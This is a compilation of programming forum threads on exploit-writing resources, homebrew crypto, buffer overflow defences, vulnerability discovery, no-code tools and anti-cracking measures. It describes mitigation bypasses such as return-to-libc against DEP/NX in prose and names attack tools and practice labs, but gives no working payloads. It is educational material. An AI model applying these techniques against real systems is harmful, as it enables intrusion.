What are some advanced and modern resources on exploit writing? - security

I've read and finished both Reversing: Secrets of Reverse Engineering and Hacking: The Art of Exploitation. They both were illuminating in their own way but I still feel like a lot of the techniques and information presented within them is outdated to some degree.
When the infamous Phrack Article, Smashing the Stack for Fun and Profit, was written 1996 it was just before what I sort of consider the Computer Security "golden age".
Writing exploits in the years that followed was relatively easy. Some basic knowledge in C and Assembly was all that was required to perform buffer overflows and execute some arbitrary shell code on a victims machine.
To put it lightly, things have gotten a lot more complicated. Now security engineers have to contend with things like Address Space Layout Randomization (ASLR), Data Execution Prevention (DEP), Stack Cookies, Heap Cookies, and much more. The complexity of writing exploits went up at least an order of magnitude.
You can't event run most of the buffer overrun exploits in the tutorials you'll find today without compiling with a bunch of flags to turn off modern protections.
Now if you want to write an exploit you have to devise ways to turn off DEP, spray the heap with your shell-code hundreds of times and attempt to guess a random memory location near your shellcode. Not to mention the pervasiveness of managed languages in use today that are much more secure when it comes to these vulnerabilities.
I'm looking to extend my security knowledge beyond writing toy-exploits for a decade old system. I'm having trouble locating resources that help address the issues of writing exploits in the face of all the protections I outlined above.
What are the more advanced and prevalent papers, books or other resources devoted to contending with the challenges of writing exploits for modern systems?

You mentioned 'Smashing the stack'. Research-wise this article was out-dated before it was even published. The late 80s Morris worm used it (to exploit fingerd IIRC). At the time it caused a huge stir because back then every server was written in optimistic C.
It took a few (10 or so) years, but gradually everyone became more conscious of security concerns related to public-facing servers.
The servers written in C were subjected to lots of security analysis and at the same time server-side processing branched out into other languages and runtimes.
Today things look a bit different. Servers are not considered a big target. These days it's clients that are the big fish. Hijack a client and the server will allow you to operate under that client's credentials.
The landscape has changed.
Personally I'm a sporadic fan of playing assembly games. I have no practical use for them, but if you want to get in on this I'd recommend checking out the Metasploit source and reading their mailing lists. They do a lot of crazy stuff and it's all out there in the open.

I'm impressed, you are a leet hacker Like me. You need to move to web applications. The majority of CVE numbers issued in the past few years have been in web applications.
Read these two papers:
http://www.securereality.com.au/studyinscarlet.txt
http://www.ngssoftware.com/papers/HackproofingMySQL.pdf
Get a LAMP stack and install these three applications:
http://sourceforge.net/projects/dvwa/ (php)
http://sourceforge.net/projects/gsblogger/ (php)
http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project (j2ee)
You should download w3af and master it. Write plugins for it. w3af is an awesome attack platform, but it is buggy and has problems with DVWA, it will rip up greyscale. Acunetix is a good commercial scanner, but it is expensive.

I highly recommend "The Shellcoder's Handbook". It's easily the best reference I've ever read when it comes to writing exploits.
If you're interested writing exploits, you're likely going to have to learn how to reverse engineer. For 99% of the world, this means IDA Pro. In my experience, there's no better IDA Pro book than Chris Eagle's "The IDA Pro Book". He details pretty much everything you'll ever need to do in IDA Pro.
There's a pretty great reverse engineering community at OpenRCE.org. Tons of papers and various helpful apps are available there. I learned about this website at an excellent bi-annual reverse engineering conference called RECon. The next event will be in 2010.
Most research these days will be "low-hanging fruit". The majority of talks at recent security conferences I've been to have been about vulnerabilities on mobile platforms (iPhone, Android, etc) where there are few to none of the protections available on modern OSes.
In general, there won't be a single reference out there that will explain how to write a modern exploit, because there's a whole host of protections built into OSes. For example, say you've found a heap vulnerability, but that pesky new Safe Unlinking feature in Windows is keeping you from gaining execution. You'd have to know that two geniuses researched this feature and found a flaw.
Good luck in your studies. Exploit writing is extremely frustrating, and EXTREMELY rewarding!
Bah! The spam thingy is keeping me from posting all of my links. Sorry!

DEP (Data Execution Prevention), NX (No-Execute) and other security enhancements that specifically disallow execution are easily by-passed by using another exploit techniques such as Ret2Lib or Ret2Esp. When an application is compiled it usually is done so with other libraries (Linux) or DLLs (Windows). These Ret2* techniques simply call an existing function() that resides in memory.
For example, in a normal exploit you may overflow the stack and then take control of the return address (EIP) with the address of a NOP Sled, your Shellcode or an Environmental Variable that contains your shellcode. When attempting this exploit on a system that does not allow the stack to be executable your code will not run. Instead, when you overflow the return address (EIP) you can point it to an existing function within memory such as system() or execv(). You pre populate the required registers with the parameters this function expects and now you can call /bin/sh without having to execute anything from the stack.
For more information look here:
http://web.textfiles.com/hacking/smackthestack.txt

Related

Using built in functions

I am developing a Windows Form Application in C#.I have heard that one should not use built in methods and functions in code since hackers have deep understanding of such built in methods and know how to fail them Instead one should always use his/her own functions and methods and if not then call built in functions intelligently from those newly made functions.How much is that true?
A supporting example in favour of my argument is that I have seen developer always develope there own made encryption algorithm like AES,DES,RC4 and Hash functions since they believe that built in encryption algorithm have many times backdoor in them.
What?! No, no, no! Whoever told you this is just wrong.
There is a common fallacy that published source code is more vulnerable to "h4ckerz" because it is available for anyone to spot the flaws in. However, I'm glad you mentioned crypto, because this is an area where this line of reasoning really stands out as the fallacy it is.
One of the most popular questions of all time on https://security.stackexchange.com/ is about a developer (in the OP he was given the pseudonym "Dave") who shared this fear of published code. Dave, like the developer you saw, was trying to homebrew his own encryption algorithm. Here's one of the most popular comments in that thread:
Dave has a fundamentally false premise, that the security of an algorithm relies on (even partially) its obscurity - that's not the case. The security of a hashing algorithm relies on the limits of our understanding of mathematics, and, to a lesser extent, the hardware ability to brute-force it. Once Dave accepts this reality (and it really is reality, read the Wikipedia article on hashing), it's a question of who is smarter - Dave by himself, or a large group of specialists devoted to this very particular problem. (emphasis added)
As a matter of fact, as it stands now, the top two memes on Security.SE are "Don't roll your own" and "Don't be a Dave".
While this has all been about crypto, this applies in general to most open-source software. The chance that a backdoor will get found and fixed goes up with each new set of eyes laid on the code. This should be a simple and uncontroversial premise: the more people are looking for something, the higher the chance it will be found. Yes, this applies to malicious users looking for exploits. However, it also applies to power users, white hat hackers, security researchers, cryptographers, professional developers, and others working for "good", which generally (hopefully) outnumber those working for "evil". This also implicitly relies on the false premise that hackers need to see the source code to do bad things. This should be obviously false based on the sheer number of proprietary systems whose source code has never been published (various Microsoft and Adobe programs come to mind) which have been inundated with vulnerabilities for years. Maybe having source code to read makes the hacker's job easier, but maybe not -- is it easier to pore over source code looking for an attack vector or to just use scanning tools and scripts against a compiled binary?
tl;dr Don't be a Dave. Rolling your own means you have to be the best at everything to succeed, instead of taking a sampling of the best the community has to offer.
Heartbleed
In your comment, you rebut:
Then why was the Heartbleed bug in openSSL not found and corrected [earlier]?
Because no one was looking at it. That's the sad truth. Here's the difference -- what happened once someone did find it? Now tens of thousands of security researchers, crypto experts, and others are looking at it. Suppose the same kind of vulnerability existed in one of the proprietary products I mentioned earlier, which it very well could. Once it's caught (if it's caught), ask yourself:
Could the team of programmers at the company responsible benefit from the help of the entire worldwide community of security experts, cryptographers, and other analysts right now?
If a bug this critical were discovered (and that's a big if!) in your software, would you be prepared to deal with the fallout caused by your custom implementation?
Unless you know of specific failure modes or weaknesses of the built-in methods your application would use and know how to minimize or eliminate them, it is probably better to use the methods provided by the language or library designers, which will often be both more efficient and more secure than what an average programmer would come up with on the fly for a particular project.
Your example absolutely does not support your view: developing your own encryption algorithm without some serious background in the domain and review by cryptanalysts, and then employing it in security-critical code, is a recipe for disaster. Even developing your own custom implementation of an industry standard encryption algorithm can present problems, and almost certainly will if you are inexperienced at it.

What are the prevention techniques for the Buffer overflow attacks?

what are the ideas of preventing buffer overflow attacks? and i heard about Stackguard,but until now is this problem completely solved by applying stackguard or combination of it with other techniques?
after warm up, as an experienced programmer
Why do you think that it is so
difficult to provide adequate
defenses for buffer overflow attacks?
Edit: thanks for all answers and keeping security tag active:)
There's a bunch of things you can do. In no particular order...
First, if your language choices are equally split (or close to equally split) between one that allows direct memory access and one that doesn't , choose the one that doesn't. That is, use Perl, Python, Lisp, Java, etc over C/C++. This isn't always an option, but it does help prevent you from shooting yourself in the foot.
Second, in languages where you have direct memory access, if classes are available that handle the memory for you, like std::string, use them. Prefer well exercised classes to classes that have fewer users. More use means that simpler problems are more likely to have been discovered in regular usage.
Third, use compiler options like ASLR and DEP. Use any security related compiler options that your application offers. This won't prevent buffer overflows, but will help mitigate the impact of any overflows.
Fourth, use static code analysis tools like Fortify, Qualys, or Veracode's service to discover overflows that you didn't mean to code. Then fix the stuff that's discovered.
Fifth, learn how overflows work, and how to spot them in code. All your coworkers should learn this, too. Create an organization-wide policy that requires people be trained in how overruns (and other vulns) work.
Sixth, do secure code reviews separately from regular code reviews. Regular code reviews make sure code works, that it passes functional tests, and that it meets coding policy (indentation, naming conventions, etc). Secure code reviews are specifically, explicitly, and only intended to look for security issues. Do secure code reviews on all code that you can. If you have to prioritize, start with mission critical stuff, stuff where problems are likely (where trust boundaries are crossed (learn about data flow diagrams and threat models and create them), where interpreters are used, and especially where user input is passed/stored/retrieved, including data retrieved from your database).
Seventh, if you have the money, hire a good consultant like Neohapsis, VSR, Matasano, etc. to review your product. They'll find far more than overruns, and your product will be all the better for it.
Eighth, make sure your QA team knows how overruns work and how to test for them. QA should have test cases specifically designed to find overruns in all inputs.
Ninth, do fuzzing. Fuzzing finds an amazingly large number of overflows in many products.
Edited to add: I misread the question. THe title says, "what are the techniques" but the text says "why is it hard".
It's hard because it's so easy to make a mistake. Little mistakes, like off-by-one errors or numeric conversions, can lead to overflows. Programs are complex beassts, with complex interactions. Where there's complexity there's problems.
Or, to turn the question back on you: why is it so hard to write bug-free code?
Buffer overflow exploits can be prevented. If programmers were perfect, there would be no
unchecked buffers, and consequently, no buffer overflow exploits. However, programmers are not
perfect, and unchecked buffers continue to abound.
Only one technique is necessary: Don't trust data from external sources.
There's no magic bullet for security: you have to design carefully, code carefully, hold code reviews, test, and arrange to fix vulnerabilities as they arise.
Fortunately, the specific case of buffer overflows has been a solved problem for a long time. Most programming languages have array bounds checking and do not allow programs to make up pointers. Just don't use the few that permit buffer overflows, such as C and C++.
Of course, this applies to the whole software stack, from embedded firmware¹ up to your application.
¹ For those of you not familiar with the technologies involved, this exploit can allow an attacker on the network to wake up and take control of a powered off computer. (Typical firewall configurations block the offending packets.)
You can run analyzers to help you find problems before the code goes into production. Our Memory Safety Checker will find buffer overuns, bad pointer faults, array access errors, and memory management mistakes in C code, by instrumenting your code to watch for mistakes at the moment they are made. If you want the C program to be impervious to such errors, you can simply use the results of the Memory Safety analyzer as the production version of your code.
In modern exploitation the big three are:
ASLR
Canary
NX Bit
Modern builds of GCC applies Canaries by default. Not all ASLR is created equally, Windows 7, Linux and *BSD have some of the best ASLR. OSX has by far the worst ASLR implementation, its trivial to bypass. Some of the most advanced buffer overflow attacks use exotic methods to bypass ASLR. The NX Bit is by far the easist method to byapss, return-to-libc style attacks make it a non-issue for exploit developers.

Finding Vulnerabilities in Software

I'm insterested to know the techniques that where used to discover vulnerabilities. I know the theory about buffer overflows, format string exploits, ecc, I also wrote some of them. But I still don't realize how to find a vulnerability in an efficient way.
I don't looking for a magic wand, I'm only looking for the most common techniques about it, I think that looking the whole source is an epic work for some project admitting that you have access to the source. Trying to fuzz on the input manually isn't so comfortable too. So I'm wondering about some tool that helps.
E.g.
I'm not realizing how the dev team can find vulnerabilities to jailbreak iPhones so fast.
They don't have source code, they can't execute programs and since there is a small number of default
programs, I don't expect a large numbers of security holes. So how to find this kind of vulnerability
so quickly?
Thank you in advance.
On the lower layers, manually examining memory can be very revealing. You can certainly view memory with a tool like Visual Studio, and I would imagine that someone has even written a tool to crudely reconstruct an application based on the instructions it executes and the data structures it places into memory.
On the web, I have found many sequence-related exploits by simply reversing the order in which an operation occurs (for example, an online transaction). Because the server is stateful but the client is stateless, you can rapidly exploit a poorly-designed process by emulating a different sequence.
As to the speed of discovery: I think quantity often trumps brilliance...put a piece of software, even a good one, in the hands of a million bored/curious/motivated people, and vulnerabilities are bound to be discovered. There is a tremendous rush to get products out the door.
There is no efficient way to do this, as firms spend a good deal of money to produce and maintain secure software. Ideally, their work in securing software does not start with a looking for vulnerabilities in the finished product; so many vulns have already been eradicated when the software is out.
Back to your question: it will depend on what you have (working binaries, complete/partial source code, etc). On the other hand, it is not finding ANY vulnerability but those that count (e.g., those that the client of the audit, or the software owner). Right?
This will help you understand the inputs and functions you need to worry about. Once you localized these, you may already have a feeling of the software's quality: if it isn't very good, then probably fuzzing will find you some bugs. Else, you need to start understanding these functions and how the input is used within the code to understand whether the code can be subverted in any way.
Some experience will help you weight how much effort to put at each task and when to push further. For example, if you see some bad practices being used, then delve deeper. If you see crypto being implemented from scratch, delve deeper. Etc
Aside from buffer overflow and format string exploits, you may want to read a bit on code injection. (a lot of what you'll come across will be web/DB related, but dig deeper) AFAIK this was a huge force in jailbreaking the iThingies. Saurik's mobile substrate allow(s) (-ed?) you to load 3rd party .dylibs, and call any code contained in those.

Successful Non-programmer, 5GL, Visual, 0 Source Code or Similar Tools?

Can anyone give me an example of successful non-programmer, 5GL (not that I am sure what they are!), visual, 0 source code or similar tools that business users or analysts can use to create applications?
I don’t believe there are and I would like to be proven wrong.
At the company that I work at, we have developed in-house MVC that we use to develop web applications. It is basically a reduced state-machine written in XML (à la Spring WebFlow) for controller and a simple template based engine for presentation. Some of the benefits:
dynamic nature: no need to recompile to see the changes
reduced “semantic load”: basically, actions in controller know only “If”. Therefore, it is easy to train someone to develop apps.
The current trend in the company (or at least at management level) is to try to produce tools for the platform that require 0 source code, are visual etc. It has a good effect on clients (or at least at management level) since:
they can be convinced that this way they will need no programmers or at least will be able to hire end-of-the-lather programmers that cost much less than typical programmers.
It appears that there is a reduced risk involved, since the tool limits the implementer or user (just don’t use the word programmer!) in what he can do, so there is a less chance that he can introduce error
It appears to simplify the whole problem since there seems to be no programming involved (notoriously complex). Since applications load dynamically, there is less complexity then typically associated with J2EE lifecycle: compile, package, deploy etc.
I am personally skeptic that something like this can be achieved. Solution we have today has a number of problems:
Implementers write JavaScript code to enrich pages (could be solved by developing widgets). Albeit client-side, still a code that can become very complex and result in some difficult bugs.
There is already a visual tool, but implementers prefer editing XML since it is quicker and easier. For comparison, I guess not many use Eclipse Spring WebFlow plug-in to edit flow XML.
There is a very poor reuse in the solution (based on copy-paste of XML). This hampers productivity and some other aspects, like fostering business knowledge.
There have been numerous performance and other issues based on incorrect use of the tools. No matter how reduced the playfield, there is always space for error.
While the platform is probably more productive than Struts, I doubt it is more productive than today’s RAD web frameworks like RoR or Grails.
Verbosity
Historically, there have been numerous failures in this direction. The idea of programs written by non-programmers is old but AFAIK never successful. At certain level, anything but the power of source code becomes irreplaceable.
Today, there is a lot of talk about DSLs, but not as something that non-programmers should write, more like something they could read.
It seems to me that the direction company is taking in this respect is a dead-end. What do you think?
EDIT: It is worth noting (and that's where some of insipiration is coming from) that many big players are experimenting in that direction. See Microsoft Popfly, Google Sites, iRise, many Mashup solutions etc.
Yes, it's a dead end. The problem is simple: no matter how simple you make the expression of a solution, you still have to analyze and understand the problem to be solved. That's about 80-90% of how (most good) programmers spend their time, and it's the part that takes the real skill and thinking. Yes, once you've decided what to do, there's some skill involved in figuring out how to do that (in a programming language of your choice). In most cases, that's a small part of the problem, and the least open to things like schedule slippage, cost overrun or outright failure.
Most serious problems in software projects occur at a much earlier stage, in the part where you're simply trying to figure out what the system should do, what users must/should/may do which things, what problems the system will (and won't) attempt to solve, and so on. Those are the hard problems, and changing the environment to expressing the solution in some way other that source code will do precisely nothing to help any of those difficult problems.
For a more complete treatise on the subject, you might want to read No Silver Bullet - Essence and Accident in Software Engineering, by Frederick Brooks (Included in the 20th Anniversary Edition of The Mythical Man-Month). The entire paper is about essentially this question: how much of the effort involved in software engineering is essential, and how much is an accidental result of the tools, environments, programming languages, etc., that we use. His conclusion was that no technology was available that gave any reasonable hope of improving productivity by as much as one order of magnitude.
Not to question the decision to use 5GLs, etc, but programming is hard.
John Skeet - Programming is Hard
Coding Horror - Programming is Hard
5GLs have been considered a dead-end for a while now.
I'm thinking of the family of products that include Ms Access, Excel, Clarion for DOS, etc. Where you can make applications with 0 source code and no programmers. Not that they are capable of AI quality operations, but they can make very usable applications.
There will always be "real" languages to do the work, but we can drag and drop the workflow.
I'm using Apple's Automator which allows users to chain together "Actions" exposed by the various applications on their systems.
Actions have inputs and/or outputs, some have UI elements and basic logic can be applied to the chain.
The key difference between automator
and other visual environments is that
the actions use existing application
code and don't require any special
installation.
More Info > http://www.macosxautomation.com/automator/
I've used it to "automate" many batch processes and had really great results (surprises me every time). I've got it running builds and backups and whenever i need to process a mess of text files it comes through.
I would love to know whether iHook or Platypus (osx wrapper builders for shell scripts) could let me develop plugins in python ....
There is definitely room for more applications like this and for more support from OSX application developers but the idea is sound.
Until there's major support there aren't many "actions" available, but a quick check on my system just showed me an extra 30 that i didn't know i had.
PS. There was another app for OS-preX called "Filter Tops" which had a much more limited set of plugins.
How about Dabble DB?
Of course, just like MS Access and other non-programmer programming platforms, it has some necessary limitations in order that the user won't get him or herself stuck... as John pointed out programming is hard. But it does give the user a lot of power, and it seems that most applications that non-programmers want to build are database-type applications anyway.

Need advice to design 'crack-proof' software [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
I am currently working on a project where i need to create some architecture, framework or any standards by which i can "at least" increase the cracking method for a software, i.e, to add to software security. There are already different ways to activate a software which includes online activation, keys etc. I am currently studying few research papers as well. But there are still lot of things that i want to discuss.
Could someone guide me to some decent forum, mailing list or something like that? or any other help would be appreciated.
I'll tell you the closest thing to "crackproof": a web application.
Desktop applications are doomed, for many other reasons, but making your application run "in the cloud", in a browser, gives you a lot more control about security.
A desktop software runs on the client's computer, so the client has full access to it. A web app runs on your server, so the client only sees a tiny bit of it.
You need to begin by infiltrating the local hacking gang, posing as an 11 year old who wants to "hack it up". Once you've earned their trust you can learn what features they find hardest to crack. As you secretly release "uncrackable" software to the local message boards, you can see what they do with it. Build upon your inner knowledge until they can no longer crack your software. When that is done, let your identity be known. Ideally, this will be seen as a sign of betrayal, that you're working against them. Hopefully this will lead them to contact other hackers outside the local community to attack your software.
Continue until you've reached the top of the hacker mafia. Write your thesis as a book, sell to HBO.
Isn't it a sign of success when your product gets cracked? :)
Seriously though - one approach is to use License objects that are serialized to XML and then encrypted using public/private key pairs. They are then read back in at runtime, de-serialized and processed to ensure they are valid.
But there is still the ubiquitous "IsValid()" method which can be cracked to always return true.
You could even put that method into a signed assembly to prevent tampering, but all you've done then is create another layer of "IsValid()" which too can be cracked.
We use licenses to turn on or off various features in our software, and to validate support/upgrade periods. But this is only for our legitimate customers. Anyone who wants to bypass it probably could.
We trust our legitimate customers to not try to bypass the licensing, and we accept that our illegitimate customers will find a way.
We would waste more money attempting to imporve the 'tamper proof' nature of our solution that we loose to people who pirate software.
Plus you've got to consider the pain to our legitimate customers, and asking them to paste a license string from their online account page is as much pain as I'd want to put them through. Why create additional barriers to entry for potential customers?
Anyway, depending on which solution you've got in place already, my description above might give you some ideas that might decrease the likelyhood someone will crack your product.
As nute said, any code you release to a customer's machine is crackable.
Don't try for "uncrackable." Try for "there's enough deterrent to reasonably protect my assets."
There are a lot of ways you can try and increase the cost of cracking. Most of them cost you but there is one thing you can do that actually reduces your costs while increasing the cost of cracking: deliver often.
There is a finite cost to cracking any given binary. That cost is increased by the number of binaries being cracked. If you release new functionality every week, you essentially bifurcate your users into two groups:
Those who don't need the latest features and can wait for a crack.
Those who do need the latest features and will pay for your software.
By engaging in the traditional anti-cracking techniques, you can multiply the cost of cracking one binary an, consequently, widen the gap between when a new feature is released and when it is available on the black market. To top it all off, your costs will go down and the amount of value you deliver in a period of time will go up - that's what makes it free.
The more often you release, the more you will find that quality and value go up, cost goes down, and the less likely people will be to steal your software.
As others have mentioned, once you release the bits to users you have given up control of them. A dedicated hacker can change the code to do whatever they want. If you want something that is closer to crack-proof, don't release the bits to users. Keep it on the server. Provide access to the application through the Internet or, if the user needs a desktop client, keep critical bits on the server and provide access to them via web services.
Like others have said, there is no way of creating a complete crack-proof software, but there are ways to make cracking the software more difficult; most of these techniques are actually used by bad guys to hide the malware inside binaries and by game companies to make cracking and copying the games more difficult.
If you are really serious about doing this, you could check e.g., what executable packers like UPX do. But then you need to implement the unpacker also. I do not actually recommend doing this, but studying game protectors and binary obfuscation might help you in your quest.
First of all, in what language are you writing this?
It's true that a crack-proof program is impossible to achieve, but you can always make it harder. A naive approach to application security means that a program can be cracked in minutes. Some tips:
If you're deploying to a virtual machine, that's too bad. There aren't many alternatives there. All popular vms (java, clr, etc.) are very simple to decompile, and no obfuscator nor signature is enough.
Try to decouple as much as possible the UI programming with the underlying program. This is also a great design principle, and will make the cracker's job harder from the GUI (e.g. enter your serial window) to track the code where you actually perform the check
If you're compiling to actual native machine code, you can always set the build as a release (not to include any debug information is crucial), with optimization as high as possible. Also in the critical parts of your application (e.g. when you validate the software), be sure to make it an inline function call, so you don't end up with a single point of failure. And call this function from many different places in your app.
As it was said before, packers always add up another layer of protection. And while there are many reliable choices now, you can end up being identified as a false positive virus by some anti-virus programs, and all the famous choices (e.g. UPX) have already pretty straight-forward unpackers.
there are some anti-debugging tricks you can also look for. But this is a hassle for you, because at some time you might also need to debug the release application!
Keep in mind that your priority is to make the critical part of your code as untraceable as possible. Clear-text strings, library calls, gui elements, etc... They are all points where an attacker may use to trace the critical parts of your code.

Resources